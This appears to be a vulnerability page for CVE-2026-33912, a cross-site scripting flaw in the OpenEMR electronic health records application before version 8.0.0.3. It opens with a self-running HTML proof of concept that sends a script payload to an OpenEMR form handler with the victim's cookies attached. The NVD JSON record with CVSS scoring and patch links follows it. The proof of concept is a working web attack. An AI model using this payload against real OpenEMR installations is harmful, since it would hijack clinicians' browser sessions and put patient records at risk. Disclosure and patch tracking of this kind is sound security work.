CVE-2026-33912

<!-- Proof of Concept for CVE-2026-33912 --> <!-- This script simulates the malicious form submission crafted by an attacker --> <html> <body> <script> function exploit() { // URL of the vulnerable OpenEMR instance form handler var targetUrl = "http://target-openemr/openemr/interface/forms/"; // Malicious payload designed to execute JS in the victim's browser var payload = "<script>alert('CVE-2026-33912 - XSS Executed');console.log(document.cookie);<\/script>"; // Constructing the form data with the injected payload var params = "form_action=save&vulnerable_field=" + encodeURIComponent(payload); // Sending the request (simulating victim submission) fetch(targetUrl, { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: params, credentials: "include" // Ensures cookies are sent if victim is logged in }).then(response => console.log("Payload sent")) .catch(error => console.error("Error:", error)); } // Automatically trigger or bind to a button click exploit(); </script> <h1>OpenEMR XSS PoC</h1> <p>If you see an alert, the vulnerability is confirmed.</p> </body> </html>

{"cve": {"id": "CVE-2026-33912", "sourceIdentifier": "[email protected]", "published": "2026-03-25T23:17:10.497", "lastModified": "2026-03-26T16:24:01.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, an authenticated attacker could craft a malicious form that, when submitted by a victim, executes arbitrary JavaScript in the victim's browser session. Version 8.0.0.3 patches the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación gratuita y de código abierto de registros de salud electrónicos y gestión de prácticas médicas. Antes de la versión 8.0.0.3, un atacante autenticado podría crear un formulario malicioso que, al ser enviado por una víctima, ejecuta JavaScript arbitrario en la sesión del navegador de la víctima. La versión 8.0.0.3 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.3", "matchCriteriaId": "E3E098AF-42A1-4798-85A7-80052F19F809"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/24dd47c3e4936a6ddd064924d17b0273c6ac4b66", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/commit/ae2a9e5edb8c88b9b0dff5969fd3aa98225f047e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/releases/tag/v8_0_0_3", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-cpph-949w-w79v", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}